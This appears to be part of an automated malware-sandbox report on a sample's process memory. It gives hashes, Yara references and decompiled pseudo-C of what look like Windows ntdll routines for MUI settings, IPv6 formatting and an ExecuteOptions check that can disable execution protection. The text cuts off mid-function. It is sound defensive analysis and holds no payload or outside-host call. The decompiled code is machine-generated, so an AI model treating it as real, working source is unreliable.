Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d86820ca6c687de5d68aeef685d0a23bf49926d2c5141c7ce281afad026012c0
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: FFE01AB1200208ABDB10DF59CC85EE737ADAF88650F018154BA0857282C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 001FD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,001F7C63,?), ref: 001FD42B

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 26cadc38b5d9910f6f8a6507594224c9cb487dedc048f1446e0aaaa580afef3b
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 7DD05E617903083AE610EAA49C03F26328DAB44B00F494064FA48972C3DA60E5004561

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02068788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02068788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02068460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0204E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0206718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02068460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0206718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02068460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02068460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02068460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0206718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0204E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02042340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0205E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0204E2A8(_t322,  &_v68, _v16);
								if(E02065553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0205E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0204E2A8(_t322,  &_v68, _t236);
								if(E02065553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0206718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0204E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02042340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0205E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0204E2A8(_v12,  &_v68, _v16);
							if(E02065553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0205E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0204E2A8(_t322,  &_v68, _t269);
							if(E02065553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0206718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0204E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02042340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0205E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0204E2A8(_v12,  &_v68, _v16);
						if(E02065553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0205E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0204E2A8(_t322,  &_v68, _t296);
						if(E02065553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0204E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02068788
0x02068788
0x02068791
0x02068794
0x02068798
0x0206879b
0x0206879e
0x020687a1
0x020687a4
0x020687a7
0x020687aa
0x020687af
0x020b1ad3
0x02068b0a
0x02068b0d
0x02068b13
0x02068b19
0x02068b1f
0x02068b25
0x02068b2b
0x02068b31
0x02068b37
0x02068b3d
0x02068b46
0x02068b46
0x020687c6
0x020687d0
0x020b1ae0
0x020b1ae6
0x020b1af8
0x020b1af8
0x020b1afd
0x020b1afe
0x020b1b01
0x020b1b06
0x020b1b06
0x020687d6
0x020687f2
0x020687f7
0x02068807
0x0206880a
0x0206880f
0x02068810
0x02068813
0x02068818
0x02068818
0x0206882c
0x02068831
0x02068838
0x02068908
0x02068920
0x020689f0
0x02068a08
0x02068af6
0x02068af6
0x02068af8
0x02068afb
0x020b1beb
0x020b1beb
0x02068b04
0x020b1bf8
0x020b1c0e
0x020b1c13
0x020b1c16
0x020b1c16
0x020b1bf8
0x00000000
0x02068b04
0x02068a0e
0x02068a11
0x02068a14
0x02068a15
0x02068a18
0x02068a22
0x02068b59
0x02068a28
0x02068a3c
0x02068a3c
0x02068a42
0x020b1bb0
0x020b1b11
0x020b1b11
0x00000000
0x02068a48
0x02068a51
0x02068a5b
0x02068a5e
0x02068a61
0x02068a69
0x02068a69
0x02068a6d
0x00000000
0x00000000
0x02068a74
0x02068a7c
0x02068a7d
0x02068a91
0x02068a93
0x02068a93
0x02068a98
0x02068a9b
0x02068aa1
0x02068aa1
0x02068aa4
0x02068aaa
0x02068ab1
0x02068ac5
0x02068ac7
0x02068ac7
0x02068ac5
0x02068ace
0x020b1bc9
0x020b1bce
0x020b1bd2
0x020b1bd2
0x02068ad8
0x02068aeb
0x02068aeb
0x02068af0
0x02068af4
0x00000000
0x02068af4
0x02068a42
0x02068926
0x02068929
0x0206892c
0x0206892d
0x02068930
0x02068935
0x0206893a
0x02068b51
0x02068940
0x02068954
0x02068954
0x0206895a
0x020b1b63
0x00000000
0x02068960
0x02068969
0x02068973
0x02068976
0x02068979
0x0206897e
0x02068981
0x02068981
0x02068986
0x00000000
0x00000000
0x020b1b6e
0x020b1b74
0x020b1b7b
0x020b1b8f
0x020b1b91
0x020b1b91
0x020b1b99
0x020b1b9c
0x020b1ba2
0x020b1ba2
0x0206898c
0x02068992
0x02068999
0x020689ad
0x020b1ba8
0x020b1ba8
0x020689ad
0x020689b6
0x020689c8
0x020689cd
0x020689d0
0x020689d0
0x020689d6
0x020689e8
0x020689e8
0x020689ed
0x00000000
0x020689ed
0x0206895a
0x0206883e
0x02068841
0x02068844
0x02068845
0x02068848
0x0206884d
0x02068852
0x02068b49
0x02068858
0x0206886c
0x0206886c
0x02068872
0x020b1b0e
0x00000000
0x02068878
0x02068881
0x0206888b
0x0206888e
0x02068891
0x02068896
0x02068899
0x02068899
0x0206889e
0x00000000
0x00000000
0x020b1b21
0x020b1b27
0x020b1b2e
0x020b1b42
0x020b1b44
0x020b1b44
0x020b1b4c
0x020b1b4f
0x020b1b55
0x020b1b55
0x020688a4
0x020688aa
0x020688b1
0x020688c5
0x020b1b5b
0x020b1b5b
0x020688c5
0x020688ce
0x020688e0
0x020688e5
0x020688e8
0x020688e8
0x020688ee
0x02068900
0x02068900
0x02068905
0x00000000
0x02068905

APIs

_wcspbrk.LIBCMT ref: 02068891
_wcspbrk.LIBCMT ref: 02068979
_wcspbrk.LIBCMT ref: 02068A61
_wcspbrk.LIBCMT ref: 02068A9B
_wcspbrk.LIBCMT ref: 020B1B9C

Strings

WindowsExcludedProcs, xrefs: 020687C1
Kernel-MUI-Language-Allowed, xrefs: 02068827
Kernel-MUI-Language-SKU, xrefs: 020689FC
Kernel-MUI-Number-Allowed, xrefs: 020687E6
Kernel-MUI-Language-Disallowed, xrefs: 02068914

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 1cde816ef8367a085f60eabf3ecdcb7f1e86840aef2a73ae5e96df43d07b1a8f
Instruction ID: da0d3a3f1fc5201e1904a41fee55e0822f359ca3ec1373916fd753fa7d392bde
Opcode Fuzzy Hash: 1cde816ef8367a085f60eabf3ecdcb7f1e86840aef2a73ae5e96df43d07b1a8f
Instruction Fuzzy Hash: C7F1C6B2D00309EFDB51DF95C9849EEB7B9FF08304F14846AE905A7610E735AA45EF60

Uniqueness

Uniqueness Score: -1.00%

Function 020813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E020813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02077707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2042926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02077707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2049cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02077707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02077707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02077707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02077707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x020813d5
0x020813d9
0x020813dc
0x020813de
0x020813e1
0x020813e8
0x020813ee
0x020ae8fd
0x00000000
0x020ae921
0x020ae921
0x020ae928
0x020ae982
0x020ae98a
0x00000000
0x020ae99a
0x020ae99e
0x020ae9a3
0x020ae9a8
0x020ae9b9
0x020ae978
0x00000000
0x020ae978
0x020ae98a
0x020ae92a
0x020ae931
0x020ae944
0x020ae944
0x020ae950
0x020ae954
0x020ae959
0x020ae95e
0x020ae963
0x020ae970
0x00000000
0x020ae975
0x020ae93b
0x020ae980
0x00000000
0x020ae980
0x020ae942
0x020ae94b
0x00000000
0x020ae94b
0x00000000
0x020ae942
0x020813f4
0x020813f4
0x020813f9
0x020813fc
0x020813ff
0x02081406
0x020ae9cc
0x020ae9d2
0x020ae9d2
0x020ae9cc
0x0208140c
0x02081411
0x02081431
0x0208143a
0x0208143c
0x0208143f
0x0208143f
0x02081442
0x02081447
0x020814a8
0x020814ac
0x020ae9e2
0x020ae9e7
0x020ae9ec
0x020aea05
0x020aea05
0x00000000
0x02081449
0x00000000
0x02081449
0x0208144c
0x02081459
0x02081462
0x02081469
0x0208146a
0x02081470
0x02081473
0x02081476
0x02081476
0x02081490
0x02081495
0x0208138e
0x02081390
0x02081397
0x02081398
0x02081399
0x020813a1
0x020813a4
0x020813a4
0x02081498
0x0208149c
0x0208149f
0x020814a2
0x00000000
0x00000000
0x020814a4
0x00000000
0x020814a4
0x02081413
0x02081415
0x02081416
0x02081419
0x0208141c
0x02081422
0x020813b7
0x020813bc
0x020813bf
0x020813bf
0x020813c2
0x02081424
0x02081424
0x02081424
0x02081427
0x0208142b
0x0208142c
0x0208142c
0x0208142c
0x00000000
0x0208141c
0x02081411

APIs

___swprintf_l.LIBCMT ref: 0208146B
___swprintf_l.LIBCMT ref: 02081490
___swprintf_l.LIBCMT ref: 020AE970

Strings

::%hs%u.%u.%u.%u, xrefs: 020AE967
::ffff:0:%u.%u.%u.%u, xrefs: 020AE9B0
:%u.%u.%u.%u, xrefs: 020AE9F4
ffff:, xrefs: 020AE94B

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2302a776cfa875f60a97acf58f09c1fc482d30feabbf876194b6336edf034918
Instruction ID: d0e23ba202e3dc673c4378a8523f77fc044dc1356db92061a053bf5aa296d967
Opcode Fuzzy Hash: 2302a776cfa875f60a97acf58f09c1fc482d30feabbf876194b6336edf034918
Instruction Fuzzy Hash: 7D6101B1D00755AADF25EF99C8909BFBBF6EF84300B54C03DE4DA4A640D734A642EB60

Uniqueness

Uniqueness Score: -1.00%

Function 02077EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02077EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2122088; // 0x767c8233
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02077F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02093F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0204DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2124218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02093F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02050D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02093F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02058375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02093F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E020BE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02093F92();
					_t38 = 1;
					L2:
					return E0204E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02077f08
0x02077f0f
0x02077f12
0x02077f1b
0x02077f31
0x02093ead
0x02093eb4
0x00000000
0x00000000
0x02093eba
0x02093ecd
0x02093ed2
0x02093ee1
0x02093ee7
0x02093eec
0x02093f12
0x02093f18
0x02093f1a
0x00000000
0x00000000
0x02093f20
0x02093f26
0x02093f28
0x00000000
0x00000000
0x02093f2e
0x02093f30
0x00000000
0x00000000
0x02093f3a
0x02093f3b
0x02093f53
0x02093f64
0x02093f69
0x02093f6c
0x02093f6d
0x02093f6f
0x0209e304
0x0209e30f
0x0209e315
0x0209e31e
0x0209e321
0x0209e327
0x0209e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0209e32f
0x0209e32f
0x0209e337
0x0209e33a
0x0209e33b
0x0209e33d
0x0209e33f
0x0209e341
0x0209e341
0x0209e34e
0x0209e353
0x0209e358
0x0209e35d
0x0209e35f
0x00000000
0x00000000
0x0209e365
0x0209e365
0x0209e368
0x0209e36e
0x00000000
0x00000000
0x0209e374
0x0209e32f
0x02093f75
0x02093f7a
0x02093f7c
0x02093f7e
0x02093f86
0x02077f39
0x02077f47
0x02077f47
0x02077f37
0x02077f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02093F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0209E2FB
ExecuteOptions, xrefs: 02093F04
CLIENT(ntdll): Processing section info %ws..., xrefs: 0209E345
Execute=1, xrefs: 02093F5E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02093EC4
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02093F4A
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02093F75

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: eb8c61ef1bc60293bfec6a23d1131044cf08aeed4122f74fd2c4ffebb62e69b3
Instruction ID: d896cb5eaaa430a3b24c5156a7e6db9a456b4a38ea9601b5483d4c3110f386e1
Opcode Fuzzy Hash: eb8c61ef1bc60293bfec6a23d1131044cf08aeed4122f74fd2c4ffebb62e69b3
Instruction Fuzzy Hash: E141C671A8031C7AEF21DA94DCC9FEEB3BDAF14704F0045A9F506E6090EB709A45AF65

Uniqueness

Uniqueness Score: -1.00%

Function 02080B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02080B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
